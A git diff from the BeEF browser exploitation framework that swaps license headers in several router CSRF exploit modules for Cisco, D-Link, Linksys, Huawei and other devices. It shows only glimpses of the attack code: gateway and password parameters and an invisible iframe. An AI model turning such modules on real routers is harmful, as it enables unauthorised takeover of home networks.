diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js
index e3c548b0e..bff4d2a4b 100644
--- a/modules/exploits/router/cisco_e2400_csrf/command.js
+++ b/modules/exploits/router/cisco_e2400_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml
index 2b3e0c519..c9be4d3ea 100644
--- a/modules/exploits/router/cisco_e2400_csrf/config.yaml
+++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb
index 0af343362..418b654ac 100644
--- a/modules/exploits/router/cisco_e2400_csrf/module.rb
+++ b/modules/exploits/router/cisco_e2400_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Cisco_e2400_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index d713b6b06..47709ed73 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd = '<%= @password %>';
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
index c579a47b9..9ad6c0ba7 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/module.rb b/modules/exploits/router/comtrend_ct5367_csrf/module.rb
index 13ae2bb76..1bc06fb2c 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5367_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Comtrend_ct5367_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index afe248983..4dbe00969 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd = '<%= @password %>';
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
index 27f47c06e..192703c9b 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/module.rb b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
index 84948985e..b22a1c9e9 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Comtrend_ct5624_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js
index e7cad9472..ac96420c6 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/command.js
+++ b/modules/exploits/router/dlink_dir_615_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
diff --git a/modules/exploits/router/dlink_dir_615_csrf/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
index 7c1ea2e30..d2ba3fabf 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/dlink_dir_615_csrf/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb
index f9a62e534..1c2d4313a 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/module.rb
+++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dir_615_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index f25c89a5b..20b7eca63 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd = '<%= @password %>';
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
index d7e6ace24..735bc0357 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/module.rb b/modules/exploits/router/dlink_dsl500t_csrf/module.rb
index 804200959..18a0c65fe 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/module.rb
+++ b/modules/exploits/router/dlink_dsl500t_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dlink_dsl500t_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index bfe98e957..db42a848c 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var username = '<%= @username %>';
diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml
index d12a65130..07ee01588 100644
--- a/modules/exploits/router/huawei_smartax_mt880/config.yaml
+++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb
index 77f39ba20..1cda0dcc3 100644
--- a/modules/exploits/router/huawei_smartax_mt880/module.rb
+++ b/modules/exploits/router/huawei_smartax_mt880/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Huawei_smartax_mt880_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js
index cb7d19eb5..f09e89f23 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/command.js
+++ b/modules/exploits/router/linksys_befsr41_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
   var befsr41_iframe = beef.dom.createInvisibleIframe();
diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
index d3308de95..663e1c058 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml
+++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/linksys_befsr41_csrf/module.rb b/modules/exploits/router/linksys_befsr41_csrf/module.rb
index 40dcaa4dc..b2e0a6582 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/module.rb
+++ b/modules/exploits/router/linksys_befsr41_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_befsr41_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
index 0f362bf89..4f76fb710 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var port = '<%= @port %>';
   var gateway = '<%= @base %>'; 
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
index a64dd89fd..7d8439e5b 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
index 94f5d6ed0..adbce13ac 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wrt54g2_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js
index d18e65898..3959cb0ae 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var port = '<%= @port %>';
   var gateway = '<%= @base %>'; 
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
index 4129d26e1..fe4845565 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/module.rb b/modules/exploits/router/linksys_wrt54g_csrf/module.rb
index 47ee87039..4641c3a31 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/module.rb
+++ b/modules/exploits/router/linksys_wrt54g_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Linksys_wrt54g_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
index fb0ed4ca4..89ab00810 100644
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var gateway = '<%= @base %>'; 
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
index e767d9fef..b4016b540 100644
--- a/modules/exploits/router/virgin_superhub_csrf/config.yaml
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
